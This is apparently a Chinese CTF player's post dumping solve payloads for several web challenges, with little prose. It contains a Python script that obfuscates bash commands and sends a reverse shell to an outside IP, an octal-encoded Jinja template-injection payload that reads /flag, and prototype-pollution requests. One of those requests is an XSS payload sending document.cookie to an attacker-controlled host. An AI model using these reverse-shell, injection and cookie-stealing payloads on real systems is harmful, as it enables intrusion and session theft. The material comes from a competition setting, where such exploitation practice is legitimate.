被队友带躺了,这里复制下 呜呜呜大师傅们太猛了8
https://hack.more.systems/writeup/2017/12/30/34c3ctf-minbashmaxfun/
#from pwn import * import sys import requests url = "http://47.108.162.43:30023" def send_cmd(cmd): #r = remote("35.198.107.77", 1337) payload = build_payload(cmd) data = { "cmd":payload } req= requests.post(url,data=data) print(req.text) def nextpid(r): r.sendline(b"$$") r.readuntil(b"bash: ") pid = int(r.readuntil(b":")[:-1], 10) print("current pid: {}".format(pid)) r.readline() return pid + 1 base_payload = rb"${0}<<<${0}\<\<\<${0}\\\<\\\<\\\<${0}\\\\\\\<\\\\\\\<\\\\\\\<\\\\\\\$\\\\\\\'" base_payload_end = rb"\\\\\\\'" def build_payload(string): bstr = string.encode() payload = base_payload for char in bstr: payload += encode_character(char) payload += base_payload_end return payload def encode_character(byte): octals = "{:o}".format(byte) payload = rb"\\\\\\\\" for octal in octals: num = int(octal, 8) if num == 0: payload += rb"$#" elif num == 1: payload += rb"${##}" else: payload += rb"\\\$\\\(\\\(" payload += rb"\$\'\\$$\'".join([rb"${##}" for i in range(num)]) payload += rb"\\\)\\\)" return payload #while True: cmd = "bash -i >& /dev/tcp/132.232.82.54/9998 0>&1" send_cmd
import sys start=r"$0<<<$0\<\<\<" for i in sys.argv[1]: payload=str(bin(int(oct(ord(i)))))[2:].replace('1','${##}').replace('0','$#') start+=r"$\'\\$(($((${##}<<${##}))#"+payload+r"))\'" print(start) #python exp.py "ls>1.txt"
http://47.108.162.43:30023/test?url={%print%0a(lipsum|attr("\137\137\147\154\157\142\141\154\163\137\137"))|attr("\137\137\147\145\164\151\164\145\155\137\137")("\137\137\142\165\151\154\164\151\156\163\137\137")|attr("\137\137\147\145\164\151\164\145\155\137\137")("\145\166\141\154")("\137\137\151\155\160\157\162\164\137\137\50\47\157\163\47\51\56\160\157\160\145\156\50\47\143\141\164\40\57\146\154\141\147\47\51\56\162\145\141\144\50\51")%}
http://47.108.162.43:30023/app.js
http://47.108.162.43:30023/package.json
https://github.com/NeSE-Team/XNUCA2020Qualifier/tree/main/Web/oooooooldjs
curl -vv --header 'Content-type: application/json' -d '{"__proto__": ["system_open": "yes"]}' http://47.108.162.43:30023/
https://twitter.com/S1r1u5_/status/1328371034064515077
{"__proto__":{"preventDefault":"x","handleObj":"x","delegateTarget":"<img/src/onerror=alert(1337)>"}}
http://47.108.162.43:3000/?data={%22__proto__%22:{%22preventDefault%22:%22x%22,%22handleObj%22:%22x%22,%22delegateTarget%22:%22%3Cimg/src/onerror=fetch(%27http://132.232.82.54:9999/?flag%3d%27%2bdocument.cookie)%3E%22}}
r然后出题人找了下 说是非预期 等一手预期解